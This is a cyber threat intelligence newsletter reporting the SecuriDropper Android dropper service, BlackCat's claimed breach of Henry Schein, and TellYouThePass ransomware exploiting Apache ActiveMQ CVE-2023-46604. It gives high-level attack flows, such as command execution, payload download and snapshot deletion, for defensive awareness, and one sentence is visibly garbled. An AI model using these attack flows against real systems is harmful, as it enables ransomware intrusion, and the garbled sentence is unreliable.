Ankura CTIX FLASH Update - November 7, 2023

Malware Activity

Researchers Detail Dropper-as-a-Service Operation "SecuriDropper" Bypassing Android's "Restricted Settings" Feature

Researchers have published a new report detailing “SecuriDropper,” a Dropper-as-a-Service (DaaS) operation that has been observed bypassing the "Restricted Settings" security measure introduced in Android 13 by Google. 

• The "Restricted Settings" measure was created to restrict privileges that allow the sideloading of applications (typically from sources other than the legitimate Google Play Store). Researchers detailed that the "Restricted Settings" feature prevents sideloaded applications from requesting “Notification Listener” access as well as accessibility settings, which are commonly sought out and abused by malware. 
• Droppers are primarily used for installing a payload on a compromised device and are notorious for allowing threat actors the ability to "separate the development and execution of an attack from the installation of malware." 
• DaaS operations offer a two (2) stage process that increases the difficulty of detection. The first stage of this process involves the distribution of a malicious application that appears legitimate, which installs the secondary payload onto the device. SecuriDropper utilizes a different Android API (Application Programming Interhan its predecessors to install its payload, which is noted as “mimicking the process used by marketplaces to install new applications.”

Researchers explained that, with this specific API, the compromised device's Operating System cannot differentiate between the fraudulent application and a legitimate marketplace, which allows the malicious application to bypass “Restricted Settings.” Technical details of the SecuriDropper DaaS operation as well as indicators of compromise (IOCs) can be viewed in the report linked below.

• The Hacker News: SecuriDropper Article
• Threat Fabric: SecuriDropper Report

Threat Actor Activity

BlackCat Ransomware Gang Claims Breach on Healthcare Giant

The BlackCat ransomware group (otherwise known as ALPHV) has recently claimed that they have successfully compromised the networks of the major United States healthcare solutions provider Henry Schein. Henry Schein disclosed mid-October 2023 that they had experienced a cyberattack affecting their manufacturing and distribution operations, which required the organization to take some of their systems offline. 

The company proceeded by involving law enforcement as well as additional external experts to assist with containing the attack and recommended that customers place orders through their specified Henry Schein representative or the company's telesales phone number. 

Approximately two weeks later, BlackCat added Henry Schein to their dark web leak site claiming to have access to thirty-five (35) terabytes of sensitive data, including payroll data and shareholder information. 

• Citing failed ongoing negotiations, the threat actors claimed to have re-encrypted the company's devices as Henry Schein was in the process of restoring their systems. 
• After releasing internal payroll data and shareholder folders, the published data and the company’s overall entry were deleted from the leak site, indicating a settlement has been reached or that new ransom negotiations are underway. 

CTIX analysts will continue to monitor BlackCat’s activity and release updates when applicable.

• Bleeping Computer: BlackCat/ALPHV Article
• Tech Radar: BlackCat/ALPHV Article

Vulnerabilities

“TellYouThePass” Ransomware Observed Targeting Critical RCE Vulnerability in Public-Facing Apache Servers

“TellYouThePass,” a ransomware variant first discovered in 2019, has resurfaced by affecting internet-facing Apache ActiveMQ Servers using CVE-2023-46604. This is a critical vulnerability (with a CVSS Score of 10/10) published in late October 2023 that has already seen a great amount of use. This vulnerability allows malicious actors to remotely execute shell commands on the affected server version. 

On November 1, 2023, researchers released a report detailing how CVE-2023-46604 was being exploited to install "HelloKitty" ransomware on client Apache ActiveMQ servers while additional researchers identified evidence of this CVE being used to deploy "SparkRAT" malware. 

According to researchers, TellYouThePass has been deployed onto Apache ActiveMQ servers using the same techniques, file encryption flow, and file enumeration flow as HelloKitty. Additionally, a number of Bitcoin Wallets, IP addresses, and email addresses were shared between the TellYouThePass and HelloKitty attacks utilizing CVE-2023-46604. 

• For ActiveMQ servers, the attack is initiated through an HTTP request to the server. This creates a CMD process that is then used to download two (2) files that lead to the dropping of a .NET DLL to the system. 
• This DLL does not use obfuscation, which allowed researchers to see its similarity with earlier versions of TellYouThePass. The ransomware then attempts to delete VSS snapshots to make system recovery more difficult before the ransom note titled “READ_ME4.html” is released after the system has been successfully encrypted. 
• Apache has already released a patch for this CVE and is directing its customers to immediately update their environments. Despite this, there are still over 9,200 Apache ActiveMQ servers that are facing the internet with more than half of them still vulnerable to CVE-2023-46604 as of November 5, 2023. 

CTIX recommends that organizations update any Apache systems or devices currently being utilized to combat this vulnerability and ransomware. Additionally, CTIX will continue to monitor the ongoing ransomware campaigns involved with this vulnerability including the deployment of TellYouThePass.

• BleepingComputer: TellYouThePass Ransomware Article
• Rapid7: CVE-2023-46604 Report
• Arctic Wolf: CVE-2023-46604 Report
• SOC Prime: CVE-2023-46604 Report

The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (flash@ankura.com) if additional context is needed.

^{© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.}